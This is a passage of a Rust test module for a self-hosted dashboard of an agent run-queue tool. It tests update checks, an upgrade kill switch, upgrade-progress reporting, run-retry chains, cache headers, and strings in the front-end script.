8875 ceiling rather than needlessly often"
8876 );
8877 }
8878
8879 #[test]
8887 fn recheck_skips_the_network_before_the_interval_elapses() {
8888 let dir = TempDir::new().expect("temp dir");
8889 let path = dir.path().join("state.json");
8890 let state = kaishin::UpdateCheckState {
8891 last_checked_unix: jiff::Timestamp::now().as_second() as u64,
8892 last_known_latest: None,
8893 last_known_url: None,
8894 };
8895 kaishin::save_check_state(&path, &state).expect("seed a just-checked state");
8896
8897 let checker = crate::updater::Checker::for_test(Duration::from_secs(24 * 60 * 60), path);
8898 assert!(
8899 !update_recheck_due(&checker, None),
8900 "a check made moments ago must not be repeated before the \
8901 configured interval elapses"
8902 );
8903 }
8904
8905 #[test]
8911 fn recheck_defers_to_an_upgrade_already_in_flight() {
8912 let dir = TempDir::new().expect("temp dir");
8913 let path = dir.path().join("state.json");
8914 let checker = crate::updater::Checker::for_test(Duration::from_secs(60 * 60), path);
8915 let progress = crate::updater::Progress::new("0.8.0".to_owned(), "v0.9.0".to_owned());
8916
8917 assert!(
8918 !update_recheck_due(&checker, Some(&progress)),
8919 "a recheck must not run while an upgrade this deck started is \
8920 still moving"
8921 );
8922 }
8923
8924 #[tokio::test]
8925 async fn an_upgrade_is_refused_by_the_no_autoupdate_kill_switch() {
8926 unsafe {
8938 std::env::set_var(crate::updater::NO_AUTOUPDATE_ENV, "1");
8939 }
8940 let fx = Fixture::start().await;
8941 let res = fx.post("/api/upgrade", None).await;
8942 unsafe {
8943 std::env::remove_var(crate::updater::NO_AUTOUPDATE_ENV);
8944 }
8945 assert_eq!(res.status, 200, "not 202: nothing was set in motion");
8946 let body = res.json();
8947 assert!(body["to"].is_null(), "there was no release to move to");
8948 assert!(body["parked"].is_null(), "and nothing was parked");
8949 assert!(
8950 body["detail"]
8951 .as_str()
8952 .unwrap()
8953 .contains("disabled by MAGI_NO_AUTOUPDATE"),
8954 "{body:?}"
8955 );
8956 }
8957
8958 #[tokio::test]
8959 async fn an_upgrade_with_nothing_to_install_changes_nothing() {
8960 let repo = TempDir::new().expect("repo dir");
8976 std::fs::write(repo.path().join("magi.toml"), "[update]\nmode = \"off\"\n")
8977 .expect("write magi.toml");
8978 let fx = Fixture::with_repo(repo.path().to_path_buf()).await;
8979
8980 let res = fx.post("/api/upgrade", None).await;
8986 assert_eq!(res.status, 200, "not 202: nothing was set in motion");
8987 let body = res.json();
8988 assert!(body["to"].is_null(), "there was no release to move to");
8989 assert!(body["parked"].is_null(), "and nothing was parked");
8990 assert!(
8991 body["detail"]
8992 .as_str()
8993 .unwrap()
8994 .contains("nothing restarted"),
8995 "{body:?}"
8996 );
8997 }
8998
8999 #[tokio::test]
9000 async fn health_reports_the_running_version_and_no_pending_upgrade_by_default() {
9001 let repo = TempDir::new().expect("repo dir");
9006 std::fs::write(repo.path().join("magi.toml"), "[update]\nmode = \"off\"\n")
9007 .expect("write magi.toml");
9008 let fx = Fixture::with_repo(repo.path().to_path_buf()).await;
9009
9010 let health = fx.get("/api/health").await.json();
9011 assert_eq!(health["version"], env!("CARGO_PKG_VERSION"));
9012 assert_eq!(
9013 health["update"]["available"], false,
9014 "checking is off, which reads as \"unknown\", not \"none\""
9015 );
9016 assert!(health["update"]["to"].is_null());
9017 assert!(
9018 health["upgrade"].is_null(),
9019 "nothing has ever asked this deck to upgrade"
9020 );
9021 }
9022
9023 #[tokio::test]
9024 async fn health_reports_a_parked_upgrade_and_what_it_is_waiting_on() {
9025 let fx = Fixture::start().await;
9026 write_run(&fx.runs(), "20260905-000000-cd51", RunStatus::Implementing);
9027
9028 let mut progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
9029 progress.parked_run = Some("20260905-000000-cd51".to_owned());
9030 progress.advance(crate::updater::Stage::Parking);
9031 crate::updater::write_progress(fx.home.path(), &progress).expect("write upgrade.json");
9032
9033 let health = fx.get("/api/health").await.json();
9034 assert_eq!(health["upgrade"]["stage"], "parking");
9035 assert_eq!(health["upgrade"]["from"], "0.5.1");
9036 assert_eq!(health["upgrade"]["to"], "0.5.2");
9037 let waiting_on = health["upgrade"]["waiting_on"]
9038 .as_str()
9039 .expect("waiting_on is set while parking a known run");
9040 assert!(waiting_on.contains("cd51"), "{waiting_on}");
9041 assert!(waiting_on.contains("implementing"), "{waiting_on}");
9042 }
9043
9044 #[tokio::test]
9045 async fn health_reports_a_finished_upgrade_with_no_waiting_on() {
9046 let fx = Fixture::start().await;
9047 let mut progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
9048 progress.advance(crate::updater::Stage::Done);
9049 crate::updater::write_progress(fx.home.path(), &progress).expect("write upgrade.json");
9050
9051 let health = fx.get("/api/health").await.json();
9052 assert_eq!(health["upgrade"]["stage"], "done");
9053 assert!(
9054 health["upgrade"]["waiting_on"].is_null(),
9055 "nothing to wait on once it is done"
9056 );
9057 }
9058
9059 #[tokio::test]
9060 async fn hand_over_advances_the_upgrade_progress_through_parking_and_restarting() {
9061 let home = TempDir::new().expect("temp home");
9062 let runs = home.path().join("runs");
9063 std::fs::create_dir_all(&runs).expect("runs dir");
9064 let ui = Ui::new(
9065 Queue::at(home.path().join("queue")),
9066 Questions::at(home.path().join("questions")),
9067 Talks::at(home.path().join("talks")),
9068 runs,
9069 home.path().to_path_buf(),
9070 PathBuf::from("/repo/magi"),
9071 )
9072 .with_launch(launch_idle);
9073 let looping = ui.looping();
9074 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
9075 .await
9076 .expect("bind loopback");
9077 let served = tokio::spawn(axum::serve(listener, ui.router()).into_future());
9078
9079 let progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
9080 crate::updater::write_progress(home.path(), &progress).expect("seed progress");
9081
9082 hand_over(home.path(), &looping, served, || Ok(()))
9083 .await
9084 .expect("hand over");
9085
9086 let after = crate::updater::read_progress(home.path()).expect("progress on disk");
9087 assert_eq!(
9088 after.stage,
9089 crate::updater::Stage::Restarting,
9090 "hand_over owns the record through parking and up to restarting; \
9091 the successor is what finishes it"
9092 );
9093 }
9094
9095 #[test]
9096 fn the_upgrade_button_arms_before_it_restarts_anything() {
9097 assert!(APP_JS.contains("upgrade: \"/api/upgrade\""));
9100 assert!(APP_JS.contains("Replace the binary and restart?"));
9101 assert!(APP_JS.contains("function confirmed("));
9102 assert!(APP_JS.contains("show(upgradeBtn, !foreign && update.available)"));
9107 assert!(
9111 APP_JS.contains("Parking, then restarting"),
9112 "the button says what it is waiting for"
9113 );
9114 assert!(APP_JS.contains("if (!out.to)"));
9117 }
9118
9119 #[test]
9120 fn stopping_the_loop_arms_but_starting_does_not() {
9121 assert!(APP_JS.contains("Finish the run(s) in flight, then stop claiming?"));
9124 assert!(APP_JS.contains("Stop claiming new tasks? Nothing is in flight."));
9125 assert!(APP_JS.contains("confirmed(button, question)"));
9126 assert!(!APP_JS.contains("setText(btn, \"Update & restart\");\n }\n }, 6000)"));
9129 assert!(APP_JS.contains("const label = btn.textContent;"));
9130 assert!(!APP_JS.contains("Neither direction is guarded"));
9131 }
9132
9133 #[test]
9134 fn the_running_version_is_shown_regardless_of_whether_an_update_exists() {
9135 assert!(
9136 APP_JS.contains("state.health.version"),
9137 "the operator wants to know what is running even with nothing newer"
9138 );
9139 assert!(APP_JS.contains("id=\"daemon-version\"") || APP_CSS.contains(".daemon-version"));
9140 }
9141
9142 #[test]
9143 fn the_upgrade_button_names_its_destination() {
9144 assert!(
9145 APP_JS.contains("`Update to ${update.to}`"),
9146 "pressing the button should not be a surprise about what it moves to"
9147 );
9148 }
9149
9150 #[test]
9151 fn an_upgrade_in_progress_is_shown_as_stages_not_as_an_error() {
9152 for stage in ["downloading", "replaced", "parking", "restarting"] {
9153 assert!(
9154 APP_JS.contains(&format!("\"{stage}\"")),
9155 "the phone must be able to tell {stage} apart from the others"
9156 );
9157 }
9158 assert!(APP_JS.contains(".waiting_on"));
9159 assert!(APP_JS.contains("function reportUnreachableDuringUpgrade("));
9164 assert!(APP_JS.contains("reconnects on its own"));
9165 }
9166
9167 #[test]
9168 fn a_failed_upgrade_does_not_lock_the_loop_controls() {
9169 let body = &APP_JS[APP_JS.find("function renderLoop(").expect("renderLoop")
9178 ..APP_JS.find("function upgrade(").expect("upgrade")];
9179 assert!(
9180 !body.contains(
9181 "upgradeStage === \"failed\") {\n setAttr(box, \"data-state\", \"failed\")"
9182 ),
9183 "a failed upgrade must not take the whole strip over the way it used to"
9184 );
9185 assert!(
9186 body.contains("upgradeFailNote"),
9187 "the failure has to reach the loop's own note instead"
9188 );
9189 assert_eq!(
9193 body.matches("upgradeFailNote].filter(Boolean).join")
9194 .count(),
9195 2,
9196 "both loop-why writers (quiet and control) must fold the note in"
9197 );
9198 }
9199
9200 #[test]
9201 fn an_overdue_upgrade_eventually_asks_for_a_human() {
9202 assert!(APP_JS.contains("UPGRADE_WAIT_LIMIT_MS = 70 * 60 * 1000"));
9205 assert!(APP_JS.contains("function upgradeOverdue("));
9206 }
9207
9208 #[test]
9209 fn coming_back_from_an_upgrade_says_which_version_it_landed_on() {
9210 assert!(
9211 APP_JS.contains("Updated to ${upgradeInfo.to"),
9212 "the operator who asked for the restart wants to know it worked"
9213 );
9214 }
9215
9216 #[test]
9217 fn an_error_is_visible_from_where_the_button_is() {
9218 let alert = &APP_CSS[APP_CSS.find(".alert {").expect(".alert")
9223 ..APP_CSS.find(".alert-text").expect(".alert-text")];
9224 assert!(
9225 alert.contains("position: fixed"),
9226 "an error about the thing under your thumb has to be visible from \
9227 where your thumb is: {alert}"
9228 );
9229 assert!(
9230 alert.contains("z-index: 25"),
9231 "above the dock (20) and the run-actions FAB (15), so neither \
9232 buries it: {alert}"
9233 );
9234 assert!(
9235 alert.contains("var(--tap)"),
9236 "and clear of the dock and the home indicator: {alert}"
9237 );
9238 assert!(
9241 alert.contains("var(--s4) + var(--tap) + var(--s3)"),
9242 "the FAB's column stays free: {alert}"
9243 );
9244 }
9245
9246 #[tokio::test]
9247 async fn an_older_attempt_says_what_replaced_it() {
9248 let fx = Fixture::start().await;
9249 let q = fx.queue();
9250 let runs = fx.runs();
9251 let (first, second) = ("20260901-000000-aaaa", "20260901-000000-bbbb");
9252 write_run(&runs, first, RunStatus::Stalled);
9253 write_run(&runs, second, RunStatus::Blocked);
9254
9255 let mut t = Task::new(
9256 "one task".to_owned(),
9257 "do it".to_owned(),
9258 PathBuf::from("/repo"),
9259 Source::Human,
9260 );
9261 t.runs = vec![first.to_owned(), second.to_owned()];
9262 q.put(&mut t).expect("put");
9263
9264 let rows = fx.get("/api/runs").await.json();
9268 let by = |short: &str| -> Value {
9269 rows.as_array()
9270 .unwrap()
9271 .iter()
9272 .find(|r| r["short"] == short)
9273 .cloned()
9274 .unwrap_or(Value::Null)
9275 };
9276 assert_eq!(by("aaaa")["superseded_by"], "bbbb");
9277 assert!(
9278 by("bbbb")["superseded_by"].is_null(),
9279 "the latest attempt is not superseded by anything"
9280 );
9281 assert!(APP_JS.contains("run.superseded_by"));
9283 assert!(APP_JS.contains("Superseded by"));
9284 }
9285
9286 #[tokio::test]
9287 async fn a_run_s_own_detail_page_says_what_replaced_it_too() {
9288 let fx = Fixture::start().await;
9293 let q = fx.queue();
9294 let runs = fx.runs();
9295 let (first, second) = ("20260901-000000-cccc", "20260901-000000-dddd");
9296 write_run(&runs, first, RunStatus::Blocked);
9297 write_run(&runs, second, RunStatus::Merged);
9298
9299 let mut t = Task::new(
9300 "one task".to_owned(),
9301 "do it".to_owned(),
9302 PathBuf::from("/repo"),
9303 Source::Human,
9304 );
9305 t.runs = vec![first.to_owned(), second.to_owned()];
9306 q.put(&mut t).expect("put");
9307
9308 let earlier = fx.get(&format!("/api/runs/{first}")).await.json();
9309 assert_eq!(earlier["superseded_by"], "dddd");
9310 assert_eq!(earlier["latest_attempt"]["id"], second);
9311 assert_eq!(earlier["latest_attempt"]["short"], "dddd");
9312 assert_eq!(
9313 earlier["latest_attempt"]["resolved"], true,
9314 "the run that replaced it landed, so this one reads as settled"
9315 );
9316
9317 let later = fx.get(&format!("/api/runs/{second}")).await.json();
9318 assert!(
9319 later["superseded_by"].is_null(),
9320 "the latest attempt is not superseded by anything"
9321 );
9322 assert!(
9323 later["latest_attempt"].is_null(),
9324 "the latest attempt has no later attempt of its own"
9325 );
9326
9327 assert!(APP_JS.contains("run.latest_attempt"));
9334 assert!(APP_JS.contains("data-superseded"));
9335 assert!(APP_JS.contains("#/runs/${latest.id}"));
9336 }
9337
9338 #[tokio::test]
9339 async fn a_chain_of_retries_points_the_oldest_at_the_current_head() {
9340 let fx = Fixture::start().await;
9346 let q = fx.queue();
9347 let runs = fx.runs();
9348 let (a, b, c) = (
9349 "20260901-000000-aaaa",
9350 "20260901-000000-bbbb",
9351 "20260901-000000-cccc",
9352 );
9353 write_run(&runs, a, RunStatus::Blocked);
9354 write_run(&runs, b, RunStatus::Blocked);
9355 write_run(&runs, c, RunStatus::Merged);
9356
9357 let mut t = Task::new(
9358 "retried twice".to_owned(),
9359 "do it".to_owned(),
9360 PathBuf::from("/repo"),
9361 Source::Human,
9362 );
9363 t.runs = vec![a.to_owned(), b.to_owned(), c.to_owned()];
9364 q.put(&mut t).expect("put");
9365
9366 let view = fx.get(&format!("/api/runs/{a}")).await.json();
9367 assert_eq!(view["superseded_by"], "bbbb", "the immediate successor");
9368 assert_eq!(
9369 view["latest_attempt"]["id"], c,
9370 "the chain's current head, not the intermediate Blocked retry"
9371 );
9372 assert_eq!(view["latest_attempt"]["resolved"], true);
9373
9374 let mid = fx.get(&format!("/api/runs/{b}")).await.json();
9375 assert_eq!(mid["latest_attempt"]["id"], c);
9376 assert_eq!(mid["latest_attempt"]["resolved"], true);
9377 }
9378
9379 #[tokio::test]
9380 async fn an_unresolved_or_unverified_successor_does_not_read_as_finished() {
9381 let fx = Fixture::start().await;
9382 let q = fx.queue();
9383 let runs = fx.runs();
9384
9385 let (still_blocked_a, still_blocked_b) = ("20260901-000000-e001", "20260901-000000-e002");
9388 write_run(&runs, still_blocked_a, RunStatus::Blocked);
9389 write_run(&runs, still_blocked_b, RunStatus::Blocked);
9390 let mut t1 = Task::new(
9391 "still stuck".to_owned(),
9392 "do it".to_owned(),
9393 PathBuf::from("/repo"),
9394 Source::Human,
9395 );
9396 t1.runs = vec![still_blocked_a.to_owned(), still_blocked_b.to_owned()];
9397 q.put(&mut t1).expect("put");
9398 let view1 = fx.get(&format!("/api/runs/{still_blocked_a}")).await.json();
9399 assert_eq!(view1["latest_attempt"]["resolved"], false);
9400
9401 let (noop_a, noop_b) = ("20260901-000000-e003", "20260901-000000-e004");
9406 write_run(&runs, noop_a, RunStatus::Blocked);
9407 write_run(&runs, noop_b, RunStatus::VerifiedNoop);
9408 let mut t2 = Task::new(
9409 "claims done".to_owned(),
9410 "do it".to_owned(),
9411 PathBuf::from("/repo"),
9412 Source::Human,
9413 );
9414 t2.runs = vec![noop_a.to_owned(), noop_b.to_owned()];
9415 q.put(&mut t2).expect("put");
9416 let view2 = fx.get(&format!("/api/runs/{noop_a}")).await.json();
9417 assert_eq!(
9418 view2["latest_attempt"]["resolved"], false,
9419 "an unverified no-op claim must not read as a confirmed finish"
9420 );
9421
9422 assert!(APP_JS.contains("latest.resolved"));
9425 }
9426
9427 #[tokio::test]
9428 async fn a_replaced_deck_is_not_served_from_a_phone_s_cache() {
9429 let fx = Fixture::start().await;
9430 let js = fx.get("/app.js").await;
9436 assert_eq!(js.status, 200);
9437 let tag = js
9438 .header("etag")
9439 .expect("an etag to revalidate against")
9440 .to_owned();
9441 assert!(tag.contains(env!("CARGO_PKG_VERSION")), "tag: {tag}");
9442 assert_eq!(
9443 js.header("cache-control"),
9444 Some("no-cache, must-revalidate"),
9445 "the phone has to ask every time"
9446 );
9447
9448 let again = fx
9451 .get_with("/app.js", &[("if-none-match", tag.as_str())])
9452 .await;
9453 assert_eq!(
9454 again.status, 304,
9455 "a deck it already has costs one round trip"
9456 );
9457 assert!(again.body.is_empty(), "304 carries no body");
9458
9459 let weak = fx
9462 .get_with("/app.js", &[("if-none-match", &format!("W/{tag}"))])
9463 .await;
9464 assert_eq!(weak.status, 304);
9465 let stale = fx
9466 .get_with("/app.js", &[("if-none-match", "\"0.0.1-1\"")])
9467 .await;
9468 assert_eq!(stale.status, 200, "an older build must be replaced");
9469 assert!(stale.body.contains("renderRunActions"));
9470 }
9471
9472 #[test]
9473 fn the_deck_never_sends_the_operator_to_a_terminal() {
9474 assert!(
9477 !APP_JS.contains("Run `magi fold` first"),
9478 "the deck must offer the fold, not prescribe a shell command"
9479 );
9480 assert!(APP_JS.contains("foldRun:"));
9481 assert!(APP_JS.contains("resumeRun:"));
9482 assert!(APP_JS.contains("renderRunActions"));
9483
9484 assert!(APP_JS.contains("armedFold"));
9486 assert!(APP_JS.contains("Yes, fold worktrees"));
9487
9488 assert!(APP_JS.contains("can no longer be resumed"));
9491 }
9492
9493 #[test]
9494 fn a_finished_run_explains_itself_with_its_own_last_line() {
9495 assert!(
9501 !APP_JS.contains("collapsed on agent quota"),
9502 "a stall must not be explained by a cause the deck did not check"
9503 );
9504 assert!(
9505 !APP_JS.contains("Review rounds ran out with findings still open, or the gate failed"),
9506 "and a block must not offer a guess with an `or` in it"
9507 );
9508
9509 assert!(
9513 APP_JS.contains("setText(r.event, run.event || \"\")"),
9514 "the run's last line is rendered unconditionally"
9515 );
9516 assert!(
9517 !APP_JS.contains("moving && run.event"),
9518 "and never gated on the run still moving"
9519 );
9520
9521 assert!(APP_JS.contains("lost to quota"));
9523 }
9524
9525 #[test]
9547 fn runs_tree_sections_and_state_chips_agree_on_what_a_run_can_be() {
9548 let shapes_marker = "const REPRESENTATIVE_RUN_SHAPES = [";
9549 let shapes_body_start =
9550 APP_JS.find(shapes_marker).expect("the shape list exists") + shapes_marker.len();
9551 let shapes_close = APP_JS[shapes_body_start..]
9552 .find("].map(")
9553 .expect("the shape list is closed by its done-computing .map(...)")
9554 + shapes_body_start;
9555 let shapes_src = &APP_JS[shapes_body_start..shapes_close];
9556
9557 let mut shapes: Vec<(bool, String, bool)> = Vec::new();
9558 for entry in shapes_src.split('{').skip(1) {
9559 let waiting = entry.contains("waiting: true");
9560 let dead = entry.contains("live: \"dead\"");
9561 let status_at =
9562 entry.find("status: \"").expect("each shape names a status") + "status: \"".len();
9563 let status_end = entry[status_at..]
9564 .find('"')
9565 .expect("the status string is closed")
9566 + status_at;
9567 shapes.push((waiting, entry[status_at..status_end].to_string(), dead));
9568 }
9569 assert!(shapes.len() >= 6, "parsed shapes: {shapes:?}");
9570
9571 let done_rule_marker = "done: !";
9575 let done_rule_at = APP_JS[shapes_close..]
9576 .find(done_rule_marker)
9577 .expect("the done rule follows the shape list")
9578 + shapes_close
9579 + done_rule_marker.len();
9580 let includes_at = APP_JS[done_rule_at..]
9581 .find(".includes(shape.status)")
9582 .expect("the done rule ends in .includes(shape.status)")
9583 + done_rule_at;
9584 let not_done: Vec<&str> = APP_JS[done_rule_at..includes_at]
9585 .trim()
9586 .trim_start_matches('[')
9587 .trim_end_matches(']')
9588 .split(',')
9589 .map(|s| s.trim().trim_matches('"'))
9590 .filter(|s| !s.is_empty())
9591 .collect();
9592
9593 let shapes: Vec<(bool, String, bool, bool)> = shapes
9594 .into_iter()
9595 .map(|(waiting, status, dead)| {
9596 let done = !not_done.contains(&status.as_str());
9597 (waiting, status, dead, done)
9598 })
9599 .collect();
9600
9601 fn run_section(waiting: bool, status: &str, dead: bool) -> &'static str {
9605 if waiting {
9606 return "waiting";
9607 }
9608 if dead
9609 && !matches!(
9610 status,
9611 "merged"
9612 | "ready"
9613 | "stalled"
9614 | "blocked"
9615 | "failed"
9616 | "verified_noop"
9617 | "superseded"
9618 )
9619 {
9620 return "stale";
9621 }
9622 match status {
9623 "merged" | "ready" => "landed",
9624 "stalled" | "blocked" | "failed" | "verified_noop" | "superseded" => "ended",
9625 _ => "flight",
9626 }
9627 }
9628
9629 fn filter_matches(filter_key: &str, waiting: bool, dead: bool, done: bool) -> bool {
9632 match filter_key {
9633 "active" => !done,
9634 "flight" => !done && !waiting && !dead,
9635 "stale" => !done && !waiting && dead,
9636 "waiting" => waiting,
9637 "done" => done,
9638 "all" => true,
9639 other => panic!("unknown RUN_STATE_FILTERS key: {other}"),
9640 }
9641 }
9642
9643 let compatible = |section: &str, filter_key: &str| {
9644 shapes.iter().any(|(waiting, status, dead, done)| {
9645 run_section(*waiting, status, *dead) == section
9646 && filter_matches(filter_key, *waiting, *dead, *done)
9647 })
9648 };
9649
9650 let expected = [
9655 ("waiting", [true, false, false, true, true, true]),
9656 ("stale", [true, false, true, false, false, true]),
9657 ("flight", [true, true, false, false, false, true]),
9658 ("landed", [false, false, false, false, true, true]),
9659 ("ended", [false, false, false, false, true, true]),
9660 ];
9661 let filter_keys = ["active", "flight", "stale", "waiting", "done", "all"];
9662
9663 for (section, wants) in expected {
9664 for (filter_key, want) in filter_keys.iter().zip(wants) {
9665 assert_eq!(
9666 compatible(section, filter_key),
9667 want,
9668 "section {section:?} x filter {filter_key:?} should be compatible: {want}"
9669 );
9670 }
9671 }
9672
9673 assert!(
9676 APP_JS.contains("function sectionCompatibleWithStateFilter(sectionKey, filterKey)")
9677 );
9678 assert!(APP_JS.contains(
9679 "if (state.runsFilter.section && !sectionCompatibleWithStateFilter(state.runsFilter.section, key))"
9680 ));
9681 assert!(APP_JS.contains(
9682 "if (!same && !sectionCompatibleWithStateFilter(section, state.runsStateFilter))"
9683 ));
9684 }
9685
9686 #[tokio::test]
9687 async fn normalize_default_repo_leaves_an_explicit_path_untouched() {
9688 let dir = tempfile::tempdir().expect("tempdir");
9692 let explicit = dir.path().join("not-a-checkout");
9693 std::fs::create_dir_all(&explicit).expect("create dir");
9694 assert_eq!(normalize_default_repo(explicit.clone()).await, explicit);
9695
9696 let missing = dir.path().join("does-not-exist-at-all");
9697 assert_eq!(normalize_default_repo(missing.clone()).await, missing);
9698 }
9699}